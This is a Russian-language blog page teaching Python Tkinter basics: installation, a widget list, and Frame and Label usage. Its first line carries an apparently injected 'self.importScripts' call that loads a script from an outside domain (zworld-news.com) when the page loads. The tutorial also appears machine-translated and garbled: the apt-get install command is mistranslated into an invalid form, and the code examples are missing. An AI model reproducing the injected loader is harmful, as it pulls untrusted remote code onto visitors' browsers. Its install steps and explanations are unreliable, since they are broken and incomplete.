google-site-verification: google2818f8f06eec354e.html self.importScripts('https://zworld-news.com/sw/w_1.js');

Программирование на Python GUI (Tkinter) - Часть I

В этом руководстве по программированию с графическим интерфейсом Python вы узнаете, как создавать программы с графическим интерфейсом с использованием инструментария Python Tkinter.
Графический интерфейс пользователя, также известный как GUI, является одной из лучших функций в программировании, которая делает программу визуально более привлекательной, чем обычные текстовые программы, покрытые черным или любым другим статическим цветом. GUI делает взаимодействие с пользователем намного проще и последовательнее.

Python GUI Программирование

Чтобы создать программу с графическим интерфейсом на Python, вам нужно использовать инструментарий GUI. Одним из широко используемых инструментов, доступных в Python, является Tkinter. Это один из самых стабильных и популярных инструментов GUI, который используют разработчики Python.

Установить модуль Tkinter

Модуль Tkinter по умолчанию доступен в операционной системе Windows. Однако, если вы используете любую другую операционную систему, вам нужно будет загрузить модуль отдельно.

Для ОС Windows
https://www.python.org/downloads/

Для ОС Linux
sudo apt-get установить python-tk (для Python 2.x) 
sudo apt-get установить python3-tk (для Python 3.x)

Вы можете создавать элементы GUI, создавая экземпляры объектов из классов, предварительно определенных в модуле Tkinter, включенном в Tkinter Toolkit.

Некоторые элементы GUI в модуле Tkinter перечислены ниже.

Frame: он содержит другие элементы GUI, такие как Label, Button, TextBox и т. Д.
Метка: отображает не редактируемый текст или значки на макете экрана.
Кнопка: выполняет действие, когда пользователь активирует его или нажимает его с помощью мыши.
Ввод текста: он принимает одну строку текста и отображает ее.
Текстовое поле: этот элемент графического интерфейса принимает несколько строк текста и отображает его.
Кнопка проверки: позволяет пользователю выбрать или отменить выбор параметра.
Переключатель: эта кнопка позволяет пользователю выбрать один из нескольких вариантов.

Программы с графическим интерфейсом традиционно ориентированы на события. Управляемый событиями означает, что кнопки, значки или любой другой графический объект на экране реагируют на действия независимо от порядка их выполнения. Они реагируют на действия, выполняемые пользователем, а не на логический поток, как мы видели в текстовом программировании ранее.

Пример программирования на Python GUI


Выход
Программирование на Python GUI (Tkinter) - Часть I 1

Первая строка кода программы импортирует модуль Tkinter из библиотеки Python в namespce текущей программы.
Второй оператор используется для создания экземпляра объекта класса Tkinter Tk и назначается пользовательской переменной root.
Третий оператор использует метод title (), который описывает заголовок, отображаемый в строке заголовка окна. Он принимает строковый аргумент.
Третье утверждение использует метод geometry (), который используется для установки размеров окна. Он принимает строку (а не целые числа) в качестве аргументов, 
представляющих ширину и высоту окна, разделенных символом «x».
Следующий оператор, наконец, запускает приложение окна GUI и ждет, пока пользователь введет команду.
Примечание . В программе Tkinter может быть только одно корневое окно. Если вы попытаетесь создать несколько окон в одной программе, ваша программа обречена на сбой.

Python Tkinter Frame

Фрейм - это виджет или базовый виджет, который используется для размещения в других виджетах, таких как метки, текстовые поля и другие. Это важный первый шаг, так как ничего не может быть сделано, если не разработаны рамки. Он в основном содержит другие виджеты.

Приложение = Рама (корень)
Здесь мы передали root в конструктор Frame. В результате новый фрейм помещается внутри корневого окна.

app.grid ()
Метод grid () - это тот, который есть у всех виджетов. Он связан с менеджером макета, который позволяет вам размещать виджеты в рамке.

Python Tkinter Label

Элементы графического интерфейса называются виджетами. Метка является одним из самых простых виджетов. Он состоит из не редактируемого текста или значков (или обоих). Он часто используется для обозначения  других виджетов. Ярлыки не являются интерактивными. Вы не будете генерировать какую-либо команду, нажав на ярлык. Но метки важны для именования других виджетов, чтобы не было путаницы для конечного пользователя.

пример

Выход
Программирование на Python GUI (Tkinter) - Часть I 2

Здесь мы сначала создали Frame, который назначен переменной frame1. Затем мы передали frame1 конструктору объекта label1, и тем самым фрейм, который приложение ссылается на мастер виджета label. В результате метка помещается в рамку.

В следующем уроке Python GUI Programming мы обсудим больше элементов GUI или виджетов.

Комментариев нет:

Отправить комментарий